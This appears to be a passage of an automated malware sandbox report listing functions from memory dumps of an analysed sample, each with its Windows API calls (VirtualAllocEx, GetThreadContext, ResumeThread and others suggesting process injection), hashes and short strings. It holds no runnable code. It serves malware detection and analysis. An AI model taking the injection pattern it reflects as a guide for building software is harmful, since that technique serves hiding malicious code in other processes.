                                      • Instruction ID: 68ea88ba7d9c4f01e4505999be06d6c193e32f785884319e62fbe915c8a94689
                                      • Opcode Fuzzy Hash: ee7453296420c9c5f18020246cb5a8c31d4589700329c772b51f13b2e82b0b9f
                                      • Instruction Fuzzy Hash: 7D21FEB19002499FCB10CF9AC884ADEFBF4FF48320F00842AE918A7250D338A954CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAC88, Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetThreadContext.KERNELBASE(?,00000000), ref: 071CACFF
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      • Opcode ID: 05bdb0f2013ac762e8fb8344ce6489af0b0284e1e53bcbc69f4d5489c0dc7a25
                                      • Instruction ID: cfb3439583fc8a39a306533dec6e15ad294b14be813925d6486e17044b6c0826
                                      • Opcode Fuzzy Hash: 05bdb0f2013ac762e8fb8344ce6489af0b0284e1e53bcbc69f4d5489c0dc7a25
                                      • Instruction Fuzzy Hash: 7521F4B1D0061A9FCB00CF9AC4857EEFBF4BB48224F14812AE418A7640D778A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 010092A8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01009951,00000800,00000000,00000000), ref: 01009B62
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: de68b01eee6e7166114bf12f0f2f1b2684237ea4c265363250112fe9efa87838
                                      • Instruction ID: dd9fe5e55cbee50c02c8721bb7f7e5e72b0fc66fb423e7022d4ae084cf5a9295
                                      • Opcode Fuzzy Hash: de68b01eee6e7166114bf12f0f2f1b2684237ea4c265363250112fe9efa87838
                                      • Instruction Fuzzy Hash: 611144B29007098FDB10CF9AC444ADEFBF4EB88324F00842AD519A7241C374A945CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAE13, Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071CAE83
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 589924b77f5943a96aee20fcf210d6a66f24ee030529930f379678fcb215e72c
                                      • Instruction ID: b4fc170be031d7d8bd2db2c3f0d599e16edacf88eadd60053092cd1bdb5905b8
                                      • Opcode Fuzzy Hash: 589924b77f5943a96aee20fcf210d6a66f24ee030529930f379678fcb215e72c
                                      • Instruction Fuzzy Hash: 2211F3B59002499FCB11DF9AC844BDEBBF5EF48324F108419E518A7250D735A958CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CB4A8, Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 071CB50D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 23e81970704de43af30e2b94dd0ecf44f72655e10ab54223927703be45872f0d
                                      • Instruction ID: 233d50be28e68704d3c992b4967b7dfd01afb8a021c7ba9f4f15b0b322e9ecd0
                                      • Opcode Fuzzy Hash: 23e81970704de43af30e2b94dd0ecf44f72655e10ab54223927703be45872f0d
                                      • Instruction Fuzzy Hash: EA1122B58003499FDB10DF9AC484BEEFBF8EB58324F10881AE554A7600C374A958CFA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAE18, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071CAE83
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 78d8ccc2e74d9ddfb0c86efcbd501957d03aac0f0874b47716b69deb7a072ef7
                                      • Instruction ID: ad7c97ecb7abfc237179b7643d58551ac02559d1aef2c4e23aaae7f5e7b75a5c
                                      • Opcode Fuzzy Hash: 78d8ccc2e74d9ddfb0c86efcbd501957d03aac0f0874b47716b69deb7a072ef7
                                      • Instruction Fuzzy Hash: DC1110B59002499FCB11CF9AC884BDEBBF8EF88324F108819E528A7250C735A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CB188, Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 2a8631bc9127f68a0cd50709c1e32cbaa96726da9a87739af4f48af06e218e9d
                                      • Instruction ID: 30d473cd2dd83ddf7e41597fb61eb4bad7a5bacda6963ca0ea8f23fedeb7d86e
                                      • Opcode Fuzzy Hash: 2a8631bc9127f68a0cd50709c1e32cbaa96726da9a87739af4f48af06e218e9d
                                      • Instruction Fuzzy Hash: EC1133B1904249CFCB20CF9AD485BDEFBF8EF48324F10885AD418A7640D775A944CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01009870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 010098D6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 623da9dd69898b8bfb3b46265f0e8dec241e4ea7f94aea7c3e8add42e79aa42c
                                      • Instruction ID: b4fa144d3a3b798b31962cd94934c7e92cf53d0af06ee425883fa43a695f081d
                                      • Opcode Fuzzy Hash: 623da9dd69898b8bfb3b46265f0e8dec241e4ea7f94aea7c3e8add42e79aa42c
                                      • Instruction Fuzzy Hash: C3110FB1C006498FDB10CF9AC444ADEFBF8EB88324F14842AD469B7740C374A645CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C0368, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 071CB50D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 67be17f252ba3962d08e82e43f8a726f4fd9205ffdf298e9e92c72373c6cc4fa
                                      • Instruction ID: f8af683a75562ae095519c421a914b8b06c39a8f65f457c619e809d24fa6d0db
                                      • Opcode Fuzzy Hash: 67be17f252ba3962d08e82e43f8a726f4fd9205ffdf298e9e92c72373c6cc4fa
                                      • Instruction Fuzzy Hash: 741122B58047499FCB20DF8AC485BDEBBF8EB58324F10881AE915B7200C374A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100FF38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,?,?), ref: 0100FF9D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID:
                                      • API String ID: 1378638983-0
                                      • Opcode ID: 455dd86d6d2e117c96252145a3c3e15677dd26597d6b56537b010a670d2526fa
                                      • Instruction ID: 7684c51f4bbbb30e511557c3d252108ea0bf5448ffc3ec60a628bfa9299037c3
                                      • Opcode Fuzzy Hash: 455dd86d6d2e117c96252145a3c3e15677dd26597d6b56537b010a670d2526fa
                                      • Instruction Fuzzy Hash: 2D11FEB5800249DFDB21CF99D484BEEBBF8EB89324F14841AE955A7780C374A945CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100FF40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,?,?), ref: 0100FF9D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID:
                                      • API String ID: 1378638983-0
                                      • Opcode ID: 7c5ef9ece6c418ec8294c3f083872ae431f263c4d3bfb6e93e31d3a5e4f2e9bc
                                      • Instruction ID: 28653a5fd760b940532bc733f22052fd161cfd5d574d791a314c1453de92f68a
                                      • Opcode Fuzzy Hash: 7c5ef9ece6c418ec8294c3f083872ae431f263c4d3bfb6e93e31d3a5e4f2e9bc
                                      • Instruction Fuzzy Hash: A111E2B59002499FDB20DF9AD584BDEFBF8EB88324F10841AE955A7740C374A944CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CB190, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 537ffb6194823330f82a671c34b34ba89c431653f3f950a60df79eeaf6b21869
                                      • Instruction ID: 68d4c327b3e51fd18e58fb08559ab6cccbc1df0a916468d52406e0932596511e
                                      • Opcode Fuzzy Hash: 537ffb6194823330f82a671c34b34ba89c431653f3f950a60df79eeaf6b21869
                                      • Instruction Fuzzy Hash: 4D1123B19042498FCB20DF9AD484BDEFBF8EB48324F10881AD428B7340D774A944CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F7D1D4, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52e6314f80595576e72f554cbca6a2cad72d99193c6f37eb4cb6b4ab77d1350a
                                      • Instruction ID: cfae6f8248512643ff109901f8db3379949390c69fe320d3f4541be50256ad80
                                      • Opcode Fuzzy Hash: 52e6314f80595576e72f554cbca6a2cad72d99193c6f37eb4cb6b4ab77d1350a
                                      • Instruction Fuzzy Hash: 99210771904204DFDB05DF54D9C0B16BBB5FF88324F64C96AD80D4B242C73AD857EA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F7D01C, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 211f108691f1ea75f634ff0635d7556a1218f50689fefffd7ffb15b04559a344
                                      • Instruction ID: 2d883fec1c9890589267acd5c043fb3b768925e38443b1708b81e770b586fb11
                                      • Opcode Fuzzy Hash: 211f108691f1ea75f634ff0635d7556a1218f50689fefffd7ffb15b04559a344
                                      • Instruction Fuzzy Hash: 7D21F276504240DFCB14DF14D9C4B16BBB5FF88324F64C96AD80E4B24AC73AD857EA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F7D005, Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ceb48b6338da8baf44977131d4903f6ed0c27ced03fd171a8d3094733089ffcb
                                      • Instruction ID: 540ac2a09f630a6a891829e0c1d685b21c7d8d63d1a970bf655a8634ffda786f
                                      • Opcode Fuzzy Hash: ceb48b6338da8baf44977131d4903f6ed0c27ced03fd171a8d3094733089ffcb
                                      • Instruction Fuzzy Hash: 4A217F755093808FCB12CF20D994B15BF71EF46224F28C5EBD8498B697C33A984ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F7D1CF, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286385975.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c1c4d15945f75f5c7145bd3be0d7b4ff171933bea9630414cfd87ddfd5d3604
                                      • Instruction ID: 8995fddf18bad5ad208fbdd2c27bcb6814b8aef766ce2c1471f807d31e882061
                                      • Opcode Fuzzy Hash: 9c1c4d15945f75f5c7145bd3be0d7b4ff171933bea9630414cfd87ddfd5d3604
                                      • Instruction Fuzzy Hash: 98118B75904280DFCB16CF10D9C4B15BFB1FF84324F28C6AAD8494B656C33AD85ADB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 071C0448, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: ]/)$g2S$g2S
                                      • API String ID: 0-2912455942
                                      • Opcode ID: 06dd0a3933b4fda7e50d446e9c84bb7159e58ed8b32631fd0857ad442b769aee
                                      • Instruction ID: 627c1f630fec7a1a9fca44b60241d55707ecafa97d0686f982825bcc8cef4992
                                      • Opcode Fuzzy Hash: 06dd0a3933b4fda7e50d446e9c84bb7159e58ed8b32631fd0857ad442b769aee
                                      • Instruction Fuzzy Hash: 7A6103B0E1420ADBCB08CFD9D8809EEFBB6FB99350F159529D515AB394D3349A81CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C043B, Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: ]/)$g2S
                                      • API String ID: 0-2150197041
                                      • Opcode ID: aa5d82300b763b36f953dda4be6f649b35a94bf9477d29c15367522f7b1f8dd3
                                      • Instruction ID: 833ce2fdf1d8ccb75e24a9f123be399b28160c814c90c2c3b98d41f179016e01
                                      • Opcode Fuzzy Hash: aa5d82300b763b36f953dda4be6f649b35a94bf9477d29c15367522f7b1f8dd3
                                      • Instruction Fuzzy Hash: C9611BB4E1420ADFCB08CF99D4809EEFBB2FB99350F15856AD515AB394D3349A81CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3268, Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: }olu$}olu
                                      • API String ID: 0-4268745816
                                      • Opcode ID: 5d6a65329c3fd3db0c8b9e7cd5a8282e690b9cc43d3cd3b3e2adb8ad58d40ea0
                                      • Instruction ID: 48f2c3b8d947f4b9ca56ba142e93c09c3e08a9e0bb4bae8481c2e86c135a99ac
                                      • Opcode Fuzzy Hash: 5d6a65329c3fd3db0c8b9e7cd5a8282e690b9cc43d3cd3b3e2adb8ad58d40ea0
                                      • Instruction Fuzzy Hash: BF7101B4E1020ADFCB08CFD9D4809AEFBB2FF59210F15951AD465AB354D730A982CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3B88, Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: %T}$%T}
                                      • API String ID: 0-2053796553
                                      • Opcode ID: fecaaada89a5a639edca60d4c70aa8ce6e2b97ec80c083eeb1dbf1216be589df
                                      • Instruction ID: 3dec1a09eba92135c43714323a6e2d03daf72f6734c0f41901ad3f0007d89547
                                      • Opcode Fuzzy Hash: fecaaada89a5a639edca60d4c70aa8ce6e2b97ec80c083eeb1dbf1216be589df
                                      • Instruction Fuzzy Hash: 0A61F6B4E1520ACFCB08CFA9C5816DEFBF2FF89210F24D42AD815B7254D3309A418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3560, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: X_S
                                      • API String ID: 0-139152347
                                      • Opcode ID: 2b7299aff3b86b695f809260bda9c5446bcc18ba4b10288aec02fafbd7e1a848
                                      • Instruction ID: c5fb982a48f1aef74d5db93f9dcc252c6023e9b5b4ca90887354b0ea42e7f7db
                                      • Opcode Fuzzy Hash: 2b7299aff3b86b695f809260bda9c5446bcc18ba4b10288aec02fafbd7e1a848
                                      • Instruction Fuzzy Hash: 496136B4E1420ADBCB08CFEAD4815EEFBB2BB99304F15C02AD521A7244D7349A42CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3258, Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: }olu
                                      • API String ID: 0-314411608
                                      • Opcode ID: acceb50d4dcf8f143e46a36197e7e8fdeba485a35568b9c1be83441f8b048934
                                      • Instruction ID: e6214186c1a48193f987f7cd80bb2b33813d45fb1bcfe7c55486634dc403a5f1
                                      • Opcode Fuzzy Hash: acceb50d4dcf8f143e46a36197e7e8fdeba485a35568b9c1be83441f8b048934
                                      • Instruction Fuzzy Hash: 416124B4E1420ADFCB08CFE9C4808AEFBB1FF99210F15951AD465AB354D7349986CF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3B83, Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: %T}
                                      • API String ID: 0-1174894000
                                      • Opcode ID: 40527bf8c760a6e2aabee273593f2dac2a27f81c67e28b12b63a7cdfe7c1ab5a
                                      • Instruction ID: bfe8a07d8648a42f5cbc586a482dc34de3b7a9f8fb3954bd8d8153d3a567acae
                                      • Opcode Fuzzy Hash: 40527bf8c760a6e2aabee273593f2dac2a27f81c67e28b12b63a7cdfe7c1ab5a
                                      • Instruction Fuzzy Hash: 8051F5B4E1520ACFCB08CFA9C5816EEFBF2FF99210F24D42AD815B7254D3309A418B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C6418, Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 09ac036da084016b8c6db603dbcbd0acb841198df47a094c3a819e5bc90d941b
                                      • Instruction ID: d769085bfbf821daf9f4562f2407106fd9174250d779ec8c9180c61abc51ac75
                                      • Opcode Fuzzy Hash: 09ac036da084016b8c6db603dbcbd0acb841198df47a094c3a819e5bc90d941b
                                      • Instruction Fuzzy Hash: 62D1BFB0E0021A8FCB08CFF9D5455EEBBF6AF98254F24852DD416A7394DB3499428B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100E578, Relevance: .3, Instructions: 315COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9988ea35be9aea52041a3a50a071d8a5add65e83719621bb815570ffce24e5f4
                                      • Instruction ID: 04561c23e5f90b8314c23cc79894b8334a54571b7548ed418464a5e9132b9467
                                      • Opcode Fuzzy Hash: 9988ea35be9aea52041a3a50a071d8a5add65e83719621bb815570ffce24e5f4
                                      • Instruction Fuzzy Hash: 8C12B4F1811746CBE330EF65F99C19BBBA1F745328B904228D2652BADDD7B8114ACF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100C134, Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00272b8fad6b3cf91e588e9e3944a588ea2345a8490ab740ee31aa85fd45a946
                                      • Instruction ID: 868e29ea24ea9c1c5a89ee446cf04c87d2e9f243825181904473c73c3d1709d4
                                      • Opcode Fuzzy Hash: 00272b8fad6b3cf91e588e9e3944a588ea2345a8490ab740ee31aa85fd45a946
                                      • Instruction Fuzzy Hash: 66A18E32E0020A8FDF16DFE5D9445DEBBF2FF85300F1581AAE905AB2A1DB31A905CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100E568, Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63e107b1347f217d5a8af5ffafdeed312a53c55ec5aa3783a0ba58423020d027
                                      • Instruction ID: 497b8e7b8ce1db58db531ee16d5385093eef11b8f5e507de7712cf26b6b9d431
                                      • Opcode Fuzzy Hash: 63e107b1347f217d5a8af5ffafdeed312a53c55ec5aa3783a0ba58423020d027
                                      • Instruction Fuzzy Hash: 67C10AB1811746CBE720EF65F89C19BBBB1FB85328F514328D1616B6D8E7B8144ACF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C8D23, Relevance: .2, Instructions: 185COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4cbf595c367a46b1bd759afc090366892578bc50ac046af2894b91f4dde2db0e
                                      • Instruction ID: 25280f756295e03fdb51fb0b597fed293a3f75a2f3c49d4c08dfbb51e42425af
                                      • Opcode Fuzzy Hash: 4cbf595c367a46b1bd759afc090366892578bc50ac046af2894b91f4dde2db0e
                                      • Instruction Fuzzy Hash: A27146B4E1520ACFCB08DFE5D5815EEBBB2EF99300F10942AD405E73A8D7349A428F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C2738, Relevance: .2, Instructions: 184COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17e674f97b2ce95e2205ce4d090b8533d00f734c328e4cfb47704f0a18091a0b
                                      • Instruction ID: 81e1bd974c890ee7515016dd703020516962cba94ae1e468b64bf9f9928acf2e
                                      • Opcode Fuzzy Hash: 17e674f97b2ce95e2205ce4d090b8533d00f734c328e4cfb47704f0a18091a0b
                                      • Instruction Fuzzy Hash: BF8102B8E1021ADFCB44CF99C98199EFBF1FF99210F158599D415AB364C374AA42CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C2728, Relevance: .2, Instructions: 184COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17bae68876f25d48a1e327597025518bf66c7683f58015665e2bc76d19716923
                                      • Instruction ID: d3b71f4739b84eab25c75b39e37b3829696e276bcde3a5aa4ca0d3da722733b9
                                      • Opcode Fuzzy Hash: 17bae68876f25d48a1e327597025518bf66c7683f58015665e2bc76d19716923
                                      • Instruction Fuzzy Hash: 278103B8E1521ADFCB44CFA9C58199EBBF1FF99210F14859AD415EB360C374AA42CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C5630, Relevance: .1, Instructions: 145COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fad1dff9719172e16a2fab3ba2098a953a7cdc64b4b78071f036ebcf726d6553
                                      • Instruction ID: 9846079719fdd7e11f091391ce2f1ad85efdb7ece9231739d11017a909968c28
                                      • Opcode Fuzzy Hash: fad1dff9719172e16a2fab3ba2098a953a7cdc64b4b78071f036ebcf726d6553
                                      • Instruction Fuzzy Hash: DD516CB0E141198BDB18DFAAC980A9EFBB7FF89305F24C569D409A7345D730AA41CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C561D, Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f19024a93b714edf0db629ee434925e79bc00679dfa48fddd41673fe408b66ae
                                      • Instruction ID: 1318f41e8bd9e421ae92b701f4130caf91f70441fa1aa310637d86b366197070
                                      • Opcode Fuzzy Hash: f19024a93b714edf0db629ee434925e79bc00679dfa48fddd41673fe408b66ae
                                      • Instruction Fuzzy Hash: 4B5160B0E141198BDB18DFA6C980A9EFBB7FF89304F24C56AD449A7345D730AA41CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C92D0, Relevance: .1, Instructions: 132COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a9aa6fbef62d290ccb1758e9dbf7f2b4209d3f3ec550d5d39d9b905cc921e5c
                                      • Instruction ID: f2203ef3a3f4ade66e08fd1033fba2d2ca6d50895301957016ce1785c41c09e5
                                      • Opcode Fuzzy Hash: 6a9aa6fbef62d290ccb1758e9dbf7f2b4209d3f3ec550d5d39d9b905cc921e5c
                                      • Instruction Fuzzy Hash: 42514DB1E1461A8BCB28CF66C944799BBB2FFD9300F15D2BAC51DA7650EB305AC18F40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3909, Relevance: .1, Instructions: 128COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b985f7f1af3ebc911d7b821a707cafefabc003d084bd46d5812bb59db8cd8e3
                                      • Instruction ID: 1b4262fcd209240cdd9052008ca38bed19d15427bdf91f9b2edb0f48c40bb13f
                                      • Opcode Fuzzy Hash: 3b985f7f1af3ebc911d7b821a707cafefabc003d084bd46d5812bb59db8cd8e3
                                      • Instruction Fuzzy Hash: 0B51F7B0E1520A9FCB48CFEAC4815AEFBF2AF99300F24D46AC425B7254D3349A51CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3918, Relevance: .1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
